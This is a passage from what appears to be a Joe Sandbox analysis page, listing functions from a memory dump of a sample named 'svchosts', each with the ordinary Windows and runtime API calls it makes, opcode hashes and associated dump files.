Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0eeff8d54303a564640c337e4c12501a8fa4038649a7f93094c24f94024c267c
Instruction ID: a4a953ca90c13ec8c1e9c6fe3f2a87fd186acc627f3d490bc907e9141723b09b
Opcode Fuzzy Hash: 0eeff8d54303a564640c337e4c12501a8fa4038649a7f93094c24f94024c267c
Instruction Fuzzy Hash: 3511A573D205299BCF22AFACCC429DDB735EF88760F454159FC08B7251CA358D708AA4

Function 0029AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 0029AA9A

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 0a8d3ab1854ee3d1a740551e016beceee51a50c87dd8f4f2ec421ba04d565c64
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: 35F03C315257069FDF70DE65C945716B7F8EB15320F20891EE49AC6690EB70D8A0CBD2

Function 00295BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00295BDC

Part of subcall function 0029B07D: __EH_prolog.LIBCMT ref: 0029B082

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2e64cdcb8cc1402bd50f2c026a75cb6d998ce2d3e1ff7583c91a46a53828f3c0
Instruction ID: d154f422c4bff7c3a3925457d91006d573eb40994e16448c0d48be7b8d35058e
Opcode Fuzzy Hash: 2e64cdcb8cc1402bd50f2c026a75cb6d998ce2d3e1ff7583c91a46a53828f3c0
Instruction Fuzzy Hash: 7701D134A20684DACB65F7B4C1453DDF7A49F1A300F40419DA89A93283CFB01B18CB62

Function 002B8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f23845654a197637b26787e32180d57c57ae6847ff012828200c09dae63e6c0f
Instruction ID: ed5a8cd2dc50d843f08d7b5c1528051caf0daef0178f81da9d87d3d4e5d5583f
Opcode Fuzzy Hash: f23845654a197637b26787e32180d57c57ae6847ff012828200c09dae63e6c0f
Instruction Fuzzy Hash: 5BE0E5315702229AEB312E699C05BDA37CC9B413F0F9A0220AD5CA2086CE60CC20CBE5

Function 002996D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0029968F,?,?,?,?,002C1FA1,000000FF), ref: 002996EB

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 72dbfc150df14293e66643c52ecfe71bded5c5a91857e457c0a42e53c40246b5
Instruction ID: 4089fadc2d8d8995deb51177229d7d36aa851b79d9a9a2111ddf64d5d619b578
Opcode Fuzzy Hash: 72dbfc150df14293e66643c52ecfe71bded5c5a91857e457c0a42e53c40246b5
Instruction Fuzzy Hash: 18F089715667054FDF308E28D548B92B7E89B16735F048B2ED0F7435E4D76168AD8F00

Function 0029A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0029A4F5

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 04a17db5407c2cc9f6a0c126898e559c78de15e8e1866f28684829101e3c5440
Instruction ID: 793a07636557780d7b0c64c48973fc08819434ce56f4e98b0631a45a82744e26
Opcode Fuzzy Hash: 04a17db5407c2cc9f6a0c126898e559c78de15e8e1866f28684829101e3c5440
Instruction Fuzzy Hash: BCF0E931428380AACF225B7848047C77BA0AF05331F14CA09F5FD02191C2B414A59F63

Function 002A067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 002A06B1

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 54a2a7b47eb31da26722b18cc2fd285f0d930b2c118bb58e5e2becf80e2418bd
Instruction ID: 7c9e817a14408eaea2572deab232a0c3be6c91af55ea7dab7dc4cba2a12584ce
Opcode Fuzzy Hash: 54a2a7b47eb31da26722b18cc2fd285f0d930b2c118bb58e5e2becf80e2418bd
Instruction Fuzzy Hash: 1DD0C2256311102BCE317B24A88EBFE1A4A4FC3B20F080062B04D136968E460CB68AA2

Function 002A9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 002A9D81

Part of subcall function 002A9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002A9B30

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 6ea909b38747dfe6847297bb0ab7c51563de0d0090ac53d16dce695268032648
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: B4D0A73023420D7FDF40FE728C02A7A7BA8EB02300F004025BC0886141ED71DEB0A671

Function 00299989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00299887), ref: 00299995

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 619879bd8fe503acd62a3da562285812af8399e6f34c4982be7fb6f96426f50a
Instruction ID: 77306a2704e48d90a485adab42ff34c2efc5160b6bcfc92ebe942d1f3bde48a7
Opcode Fuzzy Hash: 619879bd8fe503acd62a3da562285812af8399e6f34c4982be7fb6f96426f50a
Instruction Fuzzy Hash: 13D0123203214295AF659E3C9D094997751DB83376B78CAACD025C40A1D723C893F541

Function 002AD41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 002AD43F

Part of subcall function 002AAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002AAC85
Part of subcall function 002AAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002AAC96
Part of subcall function 002AAC74: IsDialogMessageW.USER32(00010450,?), ref: 002AACAA
Part of subcall function 002AAC74: TranslateMessage.USER32(?), ref: 002AACB8
Part of subcall function 002AAC74: DispatchMessageW.USER32(?), ref: 002AACC2

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 0350dee72f632dce95e8363fe95adefb4795f2e11c111ad724cfb62393f3bc9c
Instruction ID: fbe91d89fd96ff1d1c65e6b2bd45880d94448e8be03e8b16e45a9d3fceb374cd
Opcode Fuzzy Hash: 0350dee72f632dce95e8363fe95adefb4795f2e11c111ad724cfb62393f3bc9c
Instruction Fuzzy Hash: C1D09E31154300ABDA512B51DE06F1F7AE6AB89B04F404555B348740B28A629D30DF16

Function 002AD8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3943ac5f5d812ade9903c959407f9f9682eeff415b52b422504f5e29dc73d626
Instruction ID: 36ce5a3af4b142c7a38592a68b4e41dd876646ae0999dd4a146bf743badcd99e
Opcode Fuzzy Hash: 3943ac5f5d812ade9903c959407f9f9682eeff415b52b422504f5e29dc73d626
Instruction Fuzzy Hash: 16B0129527C505AE310861046C4BE3B031CD4C3B12330452EF10FD28C1DC805C390D31

Function 002AD8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 03115e71acfd9c09e478e7cad6104f33ee980195fd12362119ae5d0f4d08ce69
Instruction ID: 7ec2d06ac1b4d0957d417019975b551c1abeba0cf03cd6f41e2161ec6948bdb6
Opcode Fuzzy Hash: 03115e71acfd9c09e478e7cad6104f33ee980195fd12362119ae5d0f4d08ce69
Instruction Fuzzy Hash: 62B0129227D401AE310861046C0BE37031CC4C3B12330C52EF50FD2AC1DD805C3E0831

Function 002AD891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cabd8eea1bb227240245a921781a56018ce044cde71eb2d8b60b05d4681e4140
Instruction ID: 89bc8923d857a0d57260385a76ebbce4400e3845baad24cbbb2f2af1e4b7f653
Opcode Fuzzy Hash: cabd8eea1bb227240245a921781a56018ce044cde71eb2d8b60b05d4681e4140
Instruction Fuzzy Hash: 99B09295278601AE21082100685AD3B0218C483B123204A2AB10BE1881D8805C694831

Function 002AD8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b6abf436f7bff9b1501584cca42ac9625d7d9552420dbf535247f4bf935450bf
Instruction ID: 882bbf2da681c000323aaaa19a31c7411210b9c041d5747f24ad016eb815dbd5
Opcode Fuzzy Hash: b6abf436f7bff9b1501584cca42ac9625d7d9552420dbf535247f4bf935450bf
Instruction Fuzzy Hash: 08B012A127C501AE314861046D0BF37031CC4C3B12330462EF10FD28C1DC805C790831

Function 002AD8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f0f6ddb0c048b0a08e444033d603b147e387551166f18c75c751f125faf06e73
Instruction ID: ee988d7a504a84265a7edfe87a83306d586991bff8936618568e4edfee93d104
Opcode Fuzzy Hash: f0f6ddb0c048b0a08e444033d603b147e387551166f18c75c751f125faf06e73
Instruction Fuzzy Hash: 04B012A127C401AE310C61056D0BF37031CC4C3B12330452EF10FD28C1DC805C390831

Function 002AD8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1468b4c39286334bcb224cb2dc0cfcb215b109d3c3916407ae6ec5bb5af09bc9
Instruction ID: ede6b93eabaa0dec7c3a9f07fc8ebbc97c9a5342bdb0b512d39e49f3470d02e5
Opcode Fuzzy Hash: 1468b4c39286334bcb224cb2dc0cfcb215b109d3c3916407ae6ec5bb5af09bc9
Instruction Fuzzy Hash: 7DB012A127C401AF310C61046E0BF37031CC4C3B12330452EF10FD28C1DC805D3A0831

Function 002AD8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c4b1384f95b506e72d6dadf572ac2e9f30c82d3456eb3b4c33a750b21508712c
Instruction ID: dd217758983ba01e9bdbcc35ab55140f7619660a6293a5979624e8985a216d07
Opcode Fuzzy Hash: c4b1384f95b506e72d6dadf572ac2e9f30c82d3456eb3b4c33a750b21508712c
Instruction Fuzzy Hash: 4CB09291278401AE21086104690BE37021CC483B12320852AB10BD2A81D980583E0831

Function 002AD8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9e06e72dcc36bc50a9ba49a5271f2179cbd2d56ce5de03ed99b5e19e8748d5f8
Instruction ID: 8dd1e3b5828995508e76c47fe927e2f990ee500486a5ed6d4298d9833f6a5be2
Opcode Fuzzy Hash: 9e06e72dcc36bc50a9ba49a5271f2179cbd2d56ce5de03ed99b5e19e8748d5f8
Instruction Fuzzy Hash: E9B0129127C501AE314861046C0BE37031CC4C3B12330862EF10FD2AC1DD805CBE0831

Function 002AD8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
